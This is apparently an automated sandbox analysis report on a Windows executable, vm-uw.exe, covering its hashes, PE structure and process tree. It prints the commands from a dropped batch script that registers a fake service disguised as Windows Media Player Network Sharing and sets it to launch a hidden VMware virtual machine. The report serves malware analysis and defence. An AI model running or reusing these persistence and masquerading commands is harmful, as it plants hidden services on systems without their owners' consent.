                        SSDEEP:24:e8J5DnVZ6c3Y02M6bZAcalIAI72M6MRMJMAI72M6oB2M6oQGQEOI72M6oh1EAI0f:t5D+co0c1AP8cMRe8cMcYO8cI1EAZ0Tg
                        MD5:ED936FD33024AC753E8E7BE6B4C39F69
                        SHA1:2A9329EDEC6273CB30DFD420BDE80A4E7675FFC7
                        SHA-256:038A41E1CC19BF3833333DC8997B633CF33500A13C373593408E3416447B8553
                        SHA-512:60C95EB51C5DEDE283581BADF970B6722013A7CB3CED4716DCC74674FDD9B75227300DB0EDB8F70DC5C760D4BB8313BEA1F9403BCE2A5B9AC9BBCD10214F6D3F
                        Malicious:true
                        Preview:mode con: cols=16 lines=2..ping 127.0.0.1..C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe..ping 127.0.0.1..reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /f..reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v DisplayName /d "Windows Media Player Network Sharing Service." /t reg_sz /f..reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters..reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v AppDirectory /d "C:\Windows\Fonts\systkm32" /t reg_sz /f..reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /f..ping 127.0.0.1..sc start
                        Process:C:\Windows\Fonts\systkm32\csrss.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):181
                        Entropy (8bit):4.448922834861267
                        Encrypted:false
                        SSDEEP:3:CmXhmnXjzDZAeKXO2E77Qyd45QnBX9jgDKVgjoH/XS1FmAsoWROn:CmRmnXjP+VXO2E77/64guVJ/XSeAsLRO
                        MD5:56A963BDFAA124C4D00843552370D1FE
                        SHA1:66ED31AD816394CF07C7D8330C3E60927170BABD
                        SHA-256:1AFA092248E35494CD5153C9744494C51BF93B44BDCB38C5CAFE5B4FF88F8902
                        SHA-512:239CA8D84138FA11F8F9E74DFE8B14A2645A87D75EFC4CB495538876E5304464DCCD36DF610288C637587E7B6DB8FF4A8A91F57FA1FE71BFAF6B289A91DDB455
                        Malicious:false
                        Preview:.. CreateService SUCCESS at creating:.... WMPNetworkSxc.... You must now go to the Registry and the Services applet in the.. Control Panel and edit them as per the instructions.
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.48742080673987
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:vm-uw.exe
                        File size:580'475 bytes
                        MD5:78c6129bfd81f88cfb7171caf2d386a1
                        SHA1:f626224572dea0bc2983e3b3986bd1c1af5533ce
                        SHA256:aa1ad7c508d497292d1e017b946cc381be204bd641543bcf584da286eb6f685f
                        SHA512:38d0f61a25f015ad149765ced45ab81591ec02f9fe290c1560db9f53f9b7e6edc371eaebbcc54156006e63fe323b976bf560b9db69328f5ffe0fd9b734a9717b
                        SSDEEP:12288:LQM9bROJmafSPZDz7qElw2KxPo0q7qzC9b/uEvtHKYTsviIR8Cufe9ZqQwExr//R:Ld9Mrf7iaNVxowGT/M
                        TLSH:21C47C31B7A2C0B5C26D41301FA8EAB655AD7F244F610AE777C87E1A29F04E06635F36
                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........:.>T[.mT[.mT[.m...mY[.m...m.[.m...mN[.mT[.mV[.m.2.lW[.m.3.lF[.m.3.lL[.m.3.lz[.m.2.lU[.m]#|mP[.m]#lmE[.mT[.m.[.m.2.l.[.m.2.mU[.
                        Icon Hash:db3b74597872391b
                        Entrypoint:0x43b6f1
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x618DE39C [Fri Nov 12 03:46:36 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:eec4c9510d1f15621b464022e8c2d408
                        Instruction
                        call 00007FD3BCED83E7h
                        jmp 00007FD3BCED7B3Fh
                        call 00007FD3BCED7CE7h
                        push 00000000h
                        call 00007FD3BCED7878h
                        pop ecx
                        test al, al
                        je 00007FD3BCED7CD0h
                        push 0043B811h
                        call 00007FD3BCED7A22h
                        pop ecx
                        xor eax, eax
                        ret
                        push 00000007h
                        call 00007FD3BCED811Fh
                        int3
                        push ebp
                        mov ebp, esp
                        push FFFFFFFFh
                        push 0044F522h
                        mov eax, dword ptr fs:[00000000h]
                        push eax
                        push ebx
                        push esi
                        push edi
                        mov eax, dword ptr [0046600Ch]
                        xor eax, ebp
                        push eax
                        lea eax, dword ptr [ebp-0Ch]
                        mov dword ptr fs:[00000000h], eax
                        push 00000FA0h
                        push 00469220h
                        call dword ptr [00450044h]
                        push 004503D0h
                        call dword ptr [0045003Ch]
                        mov esi, eax
                        test esi, esi
                        jne 00007FD3BCED7CD7h
                        push 0045A754h
                        call dword ptr [0045003Ch]
                        mov esi, eax
                        test esi, esi
                        je 00007FD3BCED7D52h
                        push 00450414h
                        push esi
                        call dword ptr [0045002Ch]
                        push 00450430h
                        push esi
                        mov ebx, eax
                        call dword ptr [0045002Ch]
                        push 0045044Ch
                        push esi
                        mov edi, eax
                        call dword ptr [0045002Ch]
                        mov esi, eax
                        test ebx, ebx
                        je 00007FD3BCED7CFAh
                        test edi, edi
                        je 00007FD3BCED7CF6h
                        test esi, esi
                        je 00007FD3BCED7CF2h
                        and dword ptr [0046923Ch], 00000000h
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6498c0x8c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6f0000x1e274.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000x4e94.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x5cf700x70.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x5d0800x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5cfe00x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x500000x284.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x4e8db0x4ea007296a174c97dde3447454c549f28ba89False0.5489554352146264data6.653917614698595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x500000x157de0x15800267d5b7a634664da1012e9aa48c96ae2False0.4493095930232558data5.3004440169135085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x660000x86c00x3000548ea8cc9f1d41ead8891532908d09c7False0.18123372395833334DOS executable (block device driver \277DN\346@\273)4.487709554306666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x6f0000x1e2740x1e400020fad0e6b278437adb11a930d31859aFalse0.3044211647727273data5.185160331800087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x8e0000x4e940x50000f982d8863b6d552c167374e2ffd1f4bFalse0.58095703125data6.458158429451074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_BITMAP0x70b100x405eDevice independent bitmap graphic, 93 x 280 x 8, 1 compression, image size 15414, resolution 2834 x 2834 px/mChineseChina0.7535501881296274
                        RT_ICON0x74b700x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600ChineseChina0.08867837338262477
                        RT_ICON0x79ff80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.09529995276334435
                        RT_ICON0x7e2200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.12551867219917012
                        RT_ICON0x807c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.1775328330206379
                        RT_ICON0x818700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.14590163934426228
                        RT_ICON0x821f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.1799645390070922
                        RT_DIALOG0x826600x1dcdataChineseChina0.5903361344537815
                        RT_DIALOG0x8283c0x2f6dataChineseChina0.449868073878628
                        RT_DIALOG0x82b340x150dataChineseChina0.6398809523809523
                        RT_STRING0x82c840x52Matlab v4 mat-file (little endian) h, numeric, rows 0, columns 0ChineseChina0.7195121951219512
                        RT_STRING0x82cd80x1b4dataChineseChina0.7224770642201835
                        RT_STRING0x82e8c0x176dataChineseChina0.6417112299465241
                        RT_STRING0x830040x104dataChineseChina0.8115384615384615
                        RT_STRING0x831080xc8dataChineseChina0.75
                        RT_STRING0x831d00xb8dataChineseChina0.8695652173913043
                        RT_STRING0x832880xc4dataChineseChina0.8877551020408163
                        RT_STRING0x8334c0x148dataChineseChina0.774390243902439
                        RT_STRING0x834940x1aedataChineseChina0.7023255813953488
                        RT_STRING0x836440x11adataChineseChina0.7269503546099291
                        RT_STRING0x837600xaadataChineseChina0.8588235294117647
                        RT_STRING0x8380c0x22edataChineseChina0.7795698924731183
                        RT_STRING0x83a3c0x92dataChineseChina0.8424657534246576
                        RT_STRING0x83ad00x1b0dataChineseChina0.7453703703703703
                        RT_STRING0x83c800x10adataChineseChina0.793233082706767
                        RT_STRING0x83d8c0x1aadataChineseChina0.8004694835680751
                        RT_STRING0x83f380x12cdataChineseChina0.8333333333333334
                        RT_STRING0x840640x170dataChineseChina0.6847826086956522
                        RT_STRING0x841d40x98dataChineseChina0.5723684210526315
                        RT_STRING0x8426c0x124dataChineseChina0.6027397260273972
                        RT_STRING0x843900x180dataChineseChina0.8203125
                        RT_STRING0x845100x258dataChineseChina0.75
                        RT_STRING0x847680x13cdataChineseChina0.7468354430379747
                        RT_STRING0x848a40x336dataChineseChina0.39659367396593675
                        RT_STRING0x84bdc0x16cdataChineseChina0.6813186813186813
                        RT_STRING0x84d480x19edataChineseChina0.6714975845410628
                        RT_STRING0x84ee80x1dadataChineseChina0.729957805907173
                        RT_STRING0x850c40x72dataChineseChina0.7631578947368421
                        RT_STRING0x851380x104dataChineseChina0.7692307692307693
                        RT_STRING0x8523c0x150dataChineseChina0.8184523809523809
                        RT_STRING0x8538c0x154dataChineseChina0.7088235294117647
                        RT_STRING0x854e00xe2dataChineseChina0.7168141592920354
                        RT_STRING0x855c40x17adataChineseChina0.6375661375661376
                        RT_STRING0x857400x162dataChineseChina0.7994350282485876
                        RT_STRING0x858a40x144dataChineseChina0.7067901234567902
                        RT_STRING0x859e80xc4dataChineseChina0.8469387755102041
                        RT_STRING0x85aac0x118dataChineseChina0.7607142857142857
                        RT_STRING0x85bc40xbedataChineseChina0.8210526315789474
                        RT_STRING0x85c840x142dataChineseChina0.6490683229813664
                        RT_STRING0x85dc80xd6dataChineseChina0.8878504672897196
                        RT_STRING0x85ea00x54dataChineseChina0.7738095238095238
                        RT_STRING0x85ef40x1a4dataChineseChina0.6761904761904762
                        RT_STRING0x860980x152dataChineseChina0.7396449704142012
                        RT_STRING0x861ec0xfadataChineseChina0.756
                        RT_STRING0x862e80x134dataChineseChina0.7012987012987013
                        RT_STRING0x8641c0x144dataChineseChina0.6820987654320988
                        RT_STRING0x865600xf4dataChineseChina0.7172131147540983
                        RT_STRING0x866540x1dcdataChineseChina0.5063025210084033
                        RT_STRING0x868300x1cadataChineseChina0.4497816593886463
                        RT_STRING0x869fc0x15edataChineseChina0.6914285714285714
                        RT_STRING0x86b5c0x13adataChineseChina0.7420382165605095
                        RT_STRING0x86c980x262dataChineseChina0.5688524590163935
                        RT_STRING0x86efc0x262dataChineseChina0.6557377049180327
                        RT_STRING0x871600x34dataChineseChina0.6730769230769231
                        RT_STRING0x871940x16edataChineseChina0.7021857923497268
                        RT_STRING0x873040x196dataChineseChina0.6995073891625616
                        RT_STRING0x8749c0x1fcdataChineseChina0.5590551181102362
                        RT_STRING0x876980x28aAmigaOS bitmap font "&Tnx\232[ Rd\226\376V\007h\032\377"", fc_YSize 13568, 12134 elements, 2nd "\213S\376V\007h1Y%\215\032\377\376V\007h\357\215\204_\362]\317~X[(W\014T", 3rd ":N\034 Kb\250R\364f\260e\035 \016T2"ChineseChina0.703076923076923
                        RT_STRING0x879240x17edataChineseChina0.5916230366492147
                        RT_STRING0x87aa40x24edataChineseChina0.6237288135593221
                        RT_STRING0x87cf40xacdataChineseChina0.9941860465116279
                        RT_STRING0x87da00x15adataChineseChina0.6502890173410405
                        RT_STRING0x87efc0x136dataChineseChina0.7258064516129032
                        RT_STRING0x880340xecdataChineseChina0.6228813559322034
                        RT_STRING0x881200x1b0dataChineseChina0.5347222222222222
                        RT_STRING0x882d00x198dataChineseChina0.44362745098039214
                        RT_STRING0x884680x150dataChineseChina0.8125
                        RT_STRING0x885b80xe8dataChineseChina0.8060344827586207
                        RT_STRING0x886a00xe4dataChineseChina0.7719298245614035
                        RT_STRING0x887840x124dataChineseChina0.7397260273972602
                        RT_STRING0x888a80x1d0dataChineseChina0.6896551724137931
                        RT_STRING0x88a780x184dataChineseChina0.7860824742268041
                        RT_STRING0x88bfc0x18adataChineseChina0.7030456852791879
                        RT_STRING0x88d880x11adataChineseChina0.8404255319148937
                        RT_STRING0x88ea40x12adataChineseChina0.714765100671141
                        RT_STRING0x88fd00x1e2dataChineseChina0.7178423236514523
                        RT_STRING0x891b40x1acdataChineseChina0.6542056074766355
                        RT_STRING0x893600x100dataChineseChina0.9296875
                        RT_STRING0x894600x18edataChineseChina0.8190954773869347
                        RT_STRING0x895f00x186AmigaOS bitmap font "~bW[&{\323~\234g ", fc_YSize 31074, 58727 elementsChineseChina0.7205128205128205
                        RT_STRING0x897780x122dataChineseChina0.803448275862069
                        RT_STRING0x8989c0x16edataChineseChina0.6693989071038251
                        RT_STRING0x89a0c0x198dataChineseChina0.6887254901960784
                        RT_STRING0x89ba40x40adataChineseChina0.5667311411992263
                        RT_STRING0x89fb00xe8dataChineseChina0.8232758620689655
                        RT_STRING0x8a0980xd4dataChineseChina0.7924528301886793
                        RT_STRING0x8a16c0xdcdataChineseChina0.7863636363636364
                        RT_STRING0x8a2480x350dataChineseChina0.714622641509434
                        RT_STRING0x8a5980x90dataChineseChina0.6666666666666666
                        RT_STRING0x8a6280xdaMatlab v4 mat-file (little endian) \232[IN\006RwS\276\213n\177\014\377, numeric, rows 0, columns 0ChineseChina0.9495412844036697
                        RT_STRING0x8a7040x5cAmigaOS bitmap font "\343\211\213S\013z\217^\275_\007h", 60033 elementsChineseChina0.5869565217391305
                        RT_STRING0x8a7600x142dataChineseChina0.8385093167701864
                        RT_STRING0x8a8a40xd4dataChineseChina0.6792452830188679
                        RT_STRING0x8a9780x2cMatlab v4 mat-file (little endian) }Y\213S\236[(u\345]wQ, numeric, rows 0, columns 0ChineseChina0.6363636363636364
                        RT_STRING0x8a9a40x84dataChineseChina0.8257575757575758
                        RT_STRING0x8aa280xc2dataChineseChina0.8505154639175257
                        RT_STRING0x8aaec0x232dataChineseChina0.5907473309608541
                        RT_STRING0x8ad200x38dataChineseChina0.7321428571428571
                        RT_STRING0x8ad580x5cMatlab v4 mat-file (little endian) >f:y\346\213\306~\341Oo`\006, numeric, rows 0, columns 0ChineseChina0.6413043478260869
                        RT_STRING0x8adb40xccdataChineseChina0.8774509803921569
                        RT_STRING0x8ae800x106dataChineseChina0.7366412213740458
                        RT_STRING0x8af880x9cdataChineseChina0.782051282051282
                        RT_STRING0x8b0240x11adataChineseChina0.8014184397163121
                        RT_STRING0x8b1400x20cdataChineseChina0.5343511450381679
                        RT_STRING0x8b34c0x1e2dataChineseChina0.5622406639004149
                        RT_STRING0x8b5300x10edataChineseChina0.837037037037037
                        RT_STRING0x8b6400x17cdataChineseChina0.5210526315789473
                        RT_STRING0x8b7bc0x144dataChineseChina0.6882716049382716
                        RT_STRING0x8b9000x88Matlab v4 mat-file (little endian) O, numeric, rows 0, columns 0ChineseChina0.5294117647058824
                        RT_STRING0x8b9880x146dataChineseChina0.7699386503067485
                        RT_STRING0x8bad00xd8dataChineseChina0.8888888888888888
                        RT_STRING0x8bba80xbedataChineseChina0.8368421052631579
                        RT_STRING0x8bc680x118dataChineseChina0.8142857142857143
                        RT_STRING0x8bd800x84dataChineseChina0.8787878787878788
                        RT_STRING0x8be040xf0dataChineseChina0.8
                        RT_STRING0x8bef40x7adataChineseChina0.680327868852459
                        RT_STRING0x8bf700x78dataChineseChina0.95
                        RT_STRING0x8bfe80x106dataChineseChina0.5992366412213741
                        RT_STRING0x8c0f00xf6dataChineseChina0.8617886178861789
                        RT_STRING0x8c1e80x190dataChineseChina0.78
                        RT_STRING0x8c3780xd2dataChineseChina0.8428571428571429
                        RT_STRING0x8c44c0x106dataChineseChina0.46564885496183206
                        RT_STRING0x8c5540x182dataChineseChina0.7694300518134715
                        RT_STRING0x8c6d80x19cdataChineseChina0.779126213592233
                        RT_STRING0x8c8740x5adataChineseChina0.7
                        RT_STRING0x8c8d00x30dataChineseChina0.6666666666666666
                        RT_STRING0x8c9000x66dataChineseChina0.8235294117647058
                        RT_GROUP_ICON0x8c9680x84dataChineseChina0.7045454545454546
                        RT_VERSION0x8c9ec0x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79EnglishUnited States0.584375
                        RT_VERSION0x8cb2c0x284MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79ChineseChina0.31211180124223603
                        RT_MANIFEST0x8cdb00x4c1XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1157), with CRLF line terminatorsEnglishUnited States0.4683648315529992
                        DLLImport
                        COMCTL32.dllInitCommonControlsEx
                        SHELL32.dllSHBrowseForFolderW, SHGetFileInfoW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, ShellExecuteW, CommandLineToArgvW
                        KERNEL32.dllHeapAlloc, LocalFree, GetProcessHeap, GetFileAttributesW, LoadLibraryW, CloseHandle, GetProcAddress, FreeLibrary, GetCurrentProcess, GetVersionExW, GetModuleHandleW, ExpandEnvironmentStringsW, InitializeCriticalSectionAndSpinCount, WaitForSingleObject, CreateProcessW, GetModuleFileNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, SetFileApisToOEM, SetPriorityClass, SetThreadPriority, GetEnvironmentVariableW, GetCurrentThread, GetCommandLineW, FindResourceW, FindFirstFileW, FindNextFileW, FindClose, GetLongPathNameW, CreateFileW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetCurrentThreadId, LoadLibraryExW, WriteFile, SetFileTime, SetEndOfFile, FormatMessageW, InterlockedExchangeAdd, ReadFile, SetFilePointer, GetFileSize, ResumeThread, GetACP, GetLastError, WideCharToMultiByte, CreateDirectoryW, GetFullPathNameW, lstrlenW, RemoveDirectoryW, GetTempPathW, SetFileAttributesW, DeleteFileW, GetWindowsDirectoryW, MoveFileExW, GetTempFileNameW, MoveFileW, CreateEventW, SetEvent, ResetEvent, WaitForMultipleObjects, GetCurrentProcessId, FileTimeToSystemTime, WriteConsoleW, DecodePointer, FlushFileBuffers, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, FindFirstFileExW, LCMapStringW, HeapFree, MultiByteToWideChar, VirtualFree, VirtualAlloc, GetStringTypeW, ExitProcess, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, GetStdHandle, GetFileType, RtlUnwind, RaiseException, SetLastError, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree
                        USER32.dllDispatchMessageW, SetTimer, IsDialogMessageW, TranslateMessage, LoadIconW, KillTimer, PostQuitMessage, EnableWindow, ScreenToClient, IsWindow, MessageBoxW, ShowWindow, PostMessageW, GetWindowRect, SetWindowPos, DialogBoxParamW, SendMessageW, EndDialog, SetWindowTextW, SetFocus, GetDlgItem, GetWindowTextW, IsWindowVisible, CreateDialogParamW, GetMessageW, GetDesktopWindow, LoadStringW, DestroyIcon, GetSystemMetrics
                        GDI32.dllCreateSolidBrush, DeleteObject
                        ole32.dllCoCreateInstance, CoInitializeEx, CoUninitialize, CoInitialize
                        Language of compilation systemCountry where language is spokenMap
                        ChineseChina
                        EnglishUnited States
                        No network behavior found

                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:13:42:56
                        Start date:11/06/2024
                        Path:C:\Users\user\Desktop\vm-uw.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vm-uw.exe"
                        Imagebase:0x1e0000
                        File size:580'475 bytes
                        MD5 hash:78C6129BFD81F88CFB7171CAF2D386A1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:13:42:56
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" "
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:13:42:56
                        Start date:11/06/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:13:42:56
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\HZ~F6EC.tmp.bat"
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:13:42:56
                        Start date:11/06/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:13:42:56
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\mode.com
                        Wow64 process (32bit):true
                        Commandline:mode con: cols=16 lines=2
                        Imagebase:0x640000
                        File size:26'624 bytes
                        MD5 hash:FB615848338231CEBC16E32A3035C3F8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:7
                        Start time:13:42:57
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1
                        Imagebase:0x8c0000
                        File size:18'944 bytes
                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:8
                        Start time:13:42:57
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1 -n 2
                        Imagebase:0x8c0000
                        File size:18'944 bytes
                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:9
                        Start time:13:43:00
                        Start date:11/06/2024
                        Path:C:\Windows\Fonts\systkm32\csrss.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe
                        Imagebase:0x400000
                        File size:18'432 bytes
                        MD5 hash:C43D1B84143FB2561F22E1A2C8FACF53
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:13:43:00
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1
                        Imagebase:0x8c0000
                        File size:18'944 bytes
                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:11
                        Start time:13:43:03
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /f
                        Imagebase:0x2e0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:12
                        Start time:13:43:03
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v DisplayName /d "Windows Media Player Network Sharing Service." /t reg_sz /f
                        Imagebase:0x2e0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:13
                        Start time:13:43:03
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters
                        Imagebase:0x2e0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:14
                        Start time:13:43:03
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v AppDirectory /d "C:\Windows\Fonts\systkm32" /t reg_sz /f
                        Imagebase:0x2e0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:15
                        Start time:13:43:03
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
